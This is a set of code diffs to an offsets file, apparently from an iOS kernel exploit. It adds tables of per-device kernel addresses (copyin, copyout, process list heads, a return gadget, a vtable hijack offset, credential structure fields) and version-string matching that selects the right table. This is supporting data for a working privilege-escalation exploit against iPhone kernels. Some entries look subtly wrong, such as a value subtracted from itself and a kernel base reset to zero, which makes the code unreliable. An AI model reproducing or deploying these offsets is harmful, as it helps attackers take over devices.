+    g_offsets.copyout = 0xfffffff00718f950 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
 }
 void init_RELEASE_ARM64_S8000_1630_37894221() {
     g_offsets.kernel_base = 0xfffffff00605c000;
@@ -507,6 +564,16 @@ kern_return_t offsets_determine_initializer_for_device_and_build(char * device, 
         *func = (init_func)init_RELEASE_ARM64_T8010_1650_37895227;
         ret = KERN_SUCCESS;
     }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7001") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7001");
+        *func = (init_func)init_RELEASE_ARM64_T7001_1650_37895227;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7001");
+        *func = (init_func)init_RELEASE_ARM64_T7001_1630_37893214;
+        ret = KERN_SUCCESS;
+    }
     else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) {
         DEBUG_LOG("Detected RELEASE_ARM64_S8000");
         *func = (init_func)init_RELEASE_ARM64_S8000_1630_37893214;
@@ -515,6 +582,11 @@ kern_return_t offsets_determine_initializer_for_device_and_build(char * device, 
     else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_T7000") == 0) {
         DEBUG_LOG("Detected RELEASE_ARM64_T7000");
         *func = (init_func)init_RELEASE_ARM64_T7000_1630_37894221;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S5L8960X");
+        *func = (init_func)init_RELEASE_ARM64_S5L8960X_1630_37893214;
         ret = KERN_SUCCESS;
     }
     else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7000") == 0) {
@@ -527,9 +599,9 @@ kern_return_t offsets_determine_initializer_for_device_and_build(char * device, 
         *func = (init_func)init_RELEASE_ARM64_S8000_1650_37895227;
         ret = KERN_SUCCESS;
     }
-    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) {
-        DEBUG_LOG("Detected RELEASE_ARM64_T7000");
-        *func = (init_func)init_RELEASE_ARM64_T7000_1630_37893214;
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_T7001") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7001");
+        *func = (init_func)init_RELEASE_ARM64_T7001_1630_37894221;
         ret = KERN_SUCCESS;
     }
     else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_S5L8960X") == 0) {
@@ -542,9 +614,9 @@ kern_return_t offsets_determine_initializer_for_device_and_build(char * device, 
         *func = (init_func)init_RELEASE_ARM64_T8010_1630_37893214;
         ret = KERN_SUCCESS;
     }
-    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) {
-        DEBUG_LOG("Detected RELEASE_ARM64_S5L8960X");
-        *func = (init_func)init_RELEASE_ARM64_S5L8960X_1630_37893214;
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7000");
+        *func = (init_func)init_RELEASE_ARM64_T7000_1630_37893214;
         ret = KERN_SUCCESS;
     }
     else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:45 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_S8000") == 0) {

--- a/offsets.m
+++ b/offsets.m
@@ -169,41 +169,233 @@ void init_default(){
     g_offsets.iosurface_vtable_offset_kernel_hijack = 0x98;
 }
 
-void init_RELEASE_ARM64_T7001_1630() {
-    
-    g_offsets.kernel_base = 0xFFFFFFF0060CC000;
-    
-    /* Vtable address of IOSurface */
-    
-    g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base;
-    
-    g_offsets.panic = 0xFFFFFFF0070B6DD0 - g_offsets.kernel_base;
-    
-    g_offsets.osserializer_serialize = 0xFFFFFFF00745B0DC - g_offsets.kernel_base;
-    
-    g_offsets.copyin = 0xFFFFFFF00718F748 - g_offsets.kernel_base;
-    
-    g_offsets.copyout = 0xFFFFFFF00718F950 - g_offsets.kernel_base;
-    
+void init_RELEASE_ARM64_T8010_1630_37894221() {
+    g_offsets.kernel_base = 0xfffffff005e64000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b860 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff007491a60 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075f60e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073f5814 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff005e64000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00756e678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0063abda0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e51548 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00756e628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b86d - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071c857c - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075f0478 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071c885c - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070efcec - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d5d1 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e416 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S5L8960X_1650_37895227() {
+    g_offsets.kernel_base = 0xfffffff006190000;
+    g_offsets.l1icachesize_string = 0xfffffff00704ba73 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff007441424 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075a80c8 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073a7878 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006190000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00751e320 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064d1f70 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006f248a0 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00751e370 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704ba80 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff007181218 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075a26a0 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718140c - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aa818 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705ddd1 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e3f9 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T8010_1650_37895227() {
+    g_offsets.kernel_base = 0xfffffff005e1c000;
+    g_offsets.l1icachesize_string = 0xfffffff00704ba51 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff007486530 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075ec0c8 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073ec9e0 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff005e1c000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff007562320 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0063abf70 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e495a0 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff007562370 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704ba5e - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071c6134 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075e66f0 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071c6414 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070ef8f8 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705dda2 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e40f - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S8000_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff00605c000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b885 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744df5c - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b1104 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff00605c000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006411da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e83b88 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b892 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff007182acc - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075ac438 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff007182cd4 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aabb0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d603 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e409 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T7000_1630_37894221() {
+    g_offsets.kernel_base = 0xfffffff006144000;
+    g_offsets.l1icachesize_string = 0xfffffff007057883 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00745b100 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075c20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073be2a8 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006144000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00753a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064b9da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ef9688 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00753a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057890 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718f76c - g_offsets.kernel_base;
     g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
-    
-    g_offsets.kern_proc = 0xFFFFFFF0075C20E0 - g_offsets.kernel_base;
-    
-    g_offsets.l1dcachesize_handler = 0xFFFFFFF00753A628 - g_offsets.kernel_base;
-    
-    g_offsets.l1dcachesize_string = 0xFFFFFFF007057890 - g_offsets.kernel_base;
-    
-    g_offsets.l1icachesize_string = 0xFFFFFFF007057883 - g_offsets.kernel_base;
-    
-    g_offsets.quad_format_string = 0xFFFFFFF007069601 - g_offsets.quad_format_string;
-    
-    g_offsets.null_terminator = 0xFFFFFFF00706A407 - g_offsets.kernel_base;
-    
-    g_offsets.cachesize_callback = 0xFFFFFFF0073BE284 - g_offsets.kernel_base;
-    
-    g_offsets.sysctl_hw_family = 0xFFFFFFF00753A678 - g_offsets.kernel_base;
-    
-    g_offsets.ret_gadget = 0xFFFFFFF0070B55B8 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718f974 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T7000_1650_37895227() {
+    g_offsets.kernel_base = 0xfffffff006118000;
+    g_offsets.l1icachesize_string = 0xfffffff007057a83 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744d6ac - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b40c8 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b3b00 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff006118000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752a320 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064c9f70 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ef20e0 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752a370 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057a90 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718d3a8 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075ae6e0 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718d59c - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b69b8 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069de1 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a40f - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S8000_1650_37895227() {
+    g_offsets.kernel_base = 0xfffffff00601c000;
+    g_offsets.l1icachesize_string = 0xfffffff00704ba85 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744053c - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075a40c8 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073a6990 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff00601c000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00751a320 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006411f70 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e7bd60 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00751a370 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704ba92 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff007180720 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff00759e6c0 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff007180914 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aa798 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705dde3 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T7000_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff0060cc000;
+    g_offsets.l1icachesize_string = 0xfffffff007057883 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00745b0dc - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075c20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073be284 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff0060cc000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00753a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006455da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006ef4b08 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00753a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff007057890 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff00718f748 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075bc468 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff00718f950 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070b6dd0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff007069601 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00706a407 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S5L8960X_1630_37894221() {
+    g_offsets.kernel_base = 0xfffffff0061bc000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b893 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744ee70 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b60e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b2018 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff0061bc000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752e678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064c1da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006f2bd88 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752e628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b8a0 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071835dc - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075b0418 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071837e4 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aac30 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d611 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_T8010_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff005e64000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b860 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff007491a3c - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075f60e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073f57f0 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff005e64000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00756e678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0063abda0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e51548 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00756e628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b86d - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071c8558 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075f0478 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071c8838 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070efcec - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d5d1 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e416 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S5L8960X_1630_37893214() {
+    g_offsets.kernel_base = 0xfffffff0061bc000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b893 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744ee4c - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b60e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b1ff4 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff0061bc000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752e678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff0064c1da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006f2bd88 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752e628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b8a0 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff0071835b8 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075b0418 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff0071837c0 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aac30 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d611 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e411 - g_offsets.kernel_base;
+}
+void init_RELEASE_ARM64_S8000_1630_37894221() {
+    g_offsets.kernel_base = 0xfffffff00605c000;
+    g_offsets.l1icachesize_string = 0xfffffff00704b885 - g_offsets.kernel_base;
+    g_offsets.osserializer_serialize = 0xfffffff00744df80 - g_offsets.kernel_base;
+    g_offsets.kern_proc = 0xfffffff0075b20e0 - g_offsets.kernel_base;
+    g_offsets.cachesize_callback = 0xfffffff0073b1128 - g_offsets.kernel_base;
+    g_offsets.kernel_base = 0xfffffff00605c000 - g_offsets.kernel_base;
+    g_offsets.sysctl_hw_family = 0xfffffff00752a678 - g_offsets.kernel_base;
+    g_offsets.ret_gadget = 0xfffffff006411da0 - g_offsets.kernel_base;
+    g_offsets.iofence_vtable_offset = 0xfffffff006e83b88 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_handler = 0xfffffff00752a628 - g_offsets.kernel_base;
+    g_offsets.l1dcachesize_string = 0xfffffff00704b892 - g_offsets.kernel_base;
+    g_offsets.copyin = 0xfffffff007182af0 - g_offsets.kernel_base;
+    g_offsets.all_proc = 0xfffffff0075ac438 - g_offsets.kernel_base;
+    g_offsets.copyout = 0xfffffff007182cf8 - g_offsets.kernel_base;
+    g_offsets.panic = 0xfffffff0070aabb0 - g_offsets.kernel_base;
+    g_offsets.quad_format_string = 0xfffffff00705d603 - g_offsets.quad_format_string;
+    g_offsets.null_terminator = 0xfffffff00705e409 - g_offsets.kernel_base;
 }
 
 /*
@@ -277,6 +469,8 @@ cleanup:
     return ret;
 }
 
+void init_iphone_6_14c92() {}
+
 
 /*
  * Function name: 	offsets_determine_initializer_for_device_and_build
@@ -298,16 +492,69 @@ kern_return_t offsets_determine_initializer_for_device_and_build(char * device, 
     printf("version: %s\n", u.version);
     printf("machine: %s\n", u.machine);
     
-    if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) {
-        DEBUG_LOG("Detected RELEASE_ARM64_T7001");
-        *func = (init_func)init_RELEASE_ARM64_T7001_1630;
+    init_default();
+    
+    if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_T8010") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T8010");
+        *func = (init_func)init_RELEASE_ARM64_T8010_1630_37894221;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_S5L8960X") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S5L8960X");
+        *func = (init_func)init_RELEASE_ARM64_S5L8960X_1650_37895227;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:55 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T8010") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T8010");
+        *func = (init_func)init_RELEASE_ARM64_T8010_1650_37895227;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S8000");
+        *func = (init_func)init_RELEASE_ARM64_S8000_1630_37893214;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_T7000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7000");
+        *func = (init_func)init_RELEASE_ARM64_T7000_1630_37894221;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_T7000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T7000");
+        *func = (init_func)init_RELEASE_ARM64_T7000_1650_37895227;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.5.0: Thu Feb 23 23:22:54 PST 2017; root:xnu-3789.52.2~7/RELEASE_ARM64_S8000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S8000");
+        *func = (init_func)init_RELEASE_ARM64_S8000_1650_37895227;
         ret = KERN_SUCCESS;
     }
     else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) {
         DEBUG_LOG("Detected RELEASE_ARM64_T7000");
-        *func = (init_func)init_RELEASE_ARM64_T7001_1630;
+        *func = (init_func)init_RELEASE_ARM64_T7000_1630_37893214;
         ret = KERN_SUCCESS;
-    } else {
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:46 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_S5L8960X") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S5L8960X");
+        *func = (init_func)init_RELEASE_ARM64_S5L8960X_1630_37894221;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_T8010");
+        *func = (init_func)init_RELEASE_ARM64_T8010_1630_37893214;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S5L8960X");
+        *func = (init_func)init_RELEASE_ARM64_S5L8960X_1630_37893214;
+        ret = KERN_SUCCESS;
+    }
+    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Thu Dec 15 22:41:45 PST 2016; root:xnu-3789.42.2~1/RELEASE_ARM64_S8000") == 0) {
+        DEBUG_LOG("Detected RELEASE_ARM64_S8000");
+        *func = (init_func)init_RELEASE_ARM64_S8000_1630_37894221;
+        ret = KERN_SUCCESS;
+    }
+    else {
         ERROR_LOG("Unsupported device. quitting.");
         goto cleanup;
     }

--- a/offsets.m
+++ b/offsets.m
@@ -52,9 +52,7 @@ offsets_t offsets_get_offsets() {
 
 typedef void (*init_func)(void);
 
-void init_RELEASE_ARM64_T7001_1630() {
-    
-    g_offsets.kernel_base = 0xFFFFFFF0060CC000;
+void init_default(){
     
     /*
      Find the string "AVE ERROR: SetSessionSettings chroma_format_idc = %d."
@@ -145,13 +143,39 @@ void init_RELEASE_ARM64_T7001_1630() {
      */
     g_offsets.encode_frame_offset_keep_cache = (0x3B50);
     
-    /* Vtable address of IOSurface */
-    
-    g_offsets.iofence_vtable_offset = 0xFFFFFFF006EF4B08 - g_offsets.kernel_base;
-    
     /* IOFence current fences list head in the IOSurface object */
     
     g_offsets.iosurface_current_fences_list_head = 0x210;
+    
+    g_offsets.struct_proc_p_comm = 0x26C;
+    
+    g_offsets.struct_proc_p_ucred = 0x100;
+    
+    g_offsets.struct_kauth_cred_cr_ref = 0x10;
+    
